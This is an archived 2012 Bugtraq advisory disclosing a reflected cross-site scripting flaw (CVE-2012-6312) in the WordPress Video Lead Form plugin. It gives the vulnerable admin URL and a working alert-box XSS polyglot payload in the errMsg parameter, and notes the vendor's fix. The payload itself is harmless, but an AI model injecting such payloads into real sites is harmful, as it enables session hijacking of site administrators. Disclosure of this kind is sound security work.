lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 7 Dec 2012 08:27:24 GMT
From: nauty.me04@...il.com
To: bugtraq@...urityfocus.com
Subject: Update on CVE assigned for Video Lead Form Plugin Cross-Site

#############################
Exploit Title : Video Lead Form Plugin Cross-Site Scripting Vulnerabilities which affects Wordpress URL
Author: Aditya Balapure
home: http://adityabalapure.blogspot.in/
Date: 24/11/12
version: 0.5
software link: http://wordpress.org/extend/plugins/video-lead-form/
CVE Assigned - CVE-2012-6312.

#############################
Video Lead Form plugin description

Video Lead Form is a sales and marketing dream tool. Many people use video as a means of engaging their visitors but then have to find awkward ways to ask their visitors to submit a contact or lead form. Video Lead Form solves this problem by embedding the form directly into the video. Users of Video Lead Form can choose where in the video the form should appear, either at the beginning, the end, or five seconds after the video starts.

When a viewer submits the form, their information is emailed to you, simple as that. Video Lead Form can also be integrated with Salesforce for an even easier way to generate and manage sales leads.


##########################
XSS location

The Video Lead Form Plugin in Wordpress http://wordpress.org/extend/plugins/video-lead-form/  has a Reflective XSS vulnerability in the browser URL which affects Wordpress 3.4.2 (Platform Used)


Original URL  - http://localhost/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

Modified URL - http://localhost/wordpress/wp-admin/admin.php?page=video-lead-form&errMsg=%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

Script Used-
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

##########################
Vendor Notification

24/11/2012 to: - Vendor notified awaiting action
29/11/2012 - Fixed and closed

Powered by blists - more mailing lists